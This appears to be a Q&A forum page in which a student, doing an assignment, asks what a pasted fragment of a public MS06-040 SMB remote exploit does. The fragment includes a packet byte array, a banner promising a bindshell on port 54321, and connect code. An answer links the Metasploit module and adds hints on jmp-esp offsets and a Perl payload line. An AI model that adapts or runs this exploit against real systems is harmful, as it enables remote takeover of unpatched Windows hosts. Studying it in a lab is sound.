-1 
  [Buffer - overflow exploit code][1]

Hi so i'm doing an exploit on the windows 2000 server as part of an assignment and needed a little help. I've attached a screenshot of the exploit code thats in the c document but i dont really understand what this code does and was wondering if someone would explain to me what exactly this hard code does that in the exploit. So far i know that this code provides me with a remote bind shell at port 54321. 

char peer0_14[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };


int main(int argc,char **argv)
{

int fd;
int con;
int repbf[20000];

struct sockaddr_in target;


if(argc < 2)
{

printf("Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\n");
printf("Tested on WindowsXP SP1 EN and got a bindshell on port 54321\n");
printf("Win2k should give a crash in services.exe\n");
printf("I've used the default smbdomain: WORKGROUP\n\n");
printf("Usage: %s <ip>\n",argv[0]);
printf("Example: %s 192.168.1.103\n\n",argv[0]);
printf("Written by: Preddy\n");
printf("RootShell Security Group\n");
printf("www.team-rootshell.com\n");

exit(1);

}

fd = socket(AF_INET,SOCK_STREAM,0);

if(fd < 0)
{

perror("Could not create socket\n");
exit(1);
}

printf("Target: %s\n",argv[1]);

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(argv[1]);
target.sin_port = htons(PORT);

con = connect(fd,(struct sockaddr_in *)&target,sizeof(target));

if(con < 0)
{

printf("Could not connect\n");
exit(1);
}

this is the exploit code thanks

Improve this question
0

1 Answer 1

Reset to default
1

Since the code you pasted is not a full exploit code and the all datas are in array form, it is hard to understand how the exploit works.

I suggests you to look at below links

https://www.rapid7.com/db/modules/exploit/windows/smb/ms06_040_netapi https://vulners.com/exploitdb/EDB-ID:2162

i didn't reverse engineered it but it seems to use jmp esp tricks and uses a fixed address for this gadget. maybe i think you should change some offset to fit your os version.

for XP version following line is key for exploit.

my $path = $shellcode . (pack('V', $target->[2]) x 16) . "\x00\x00";

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.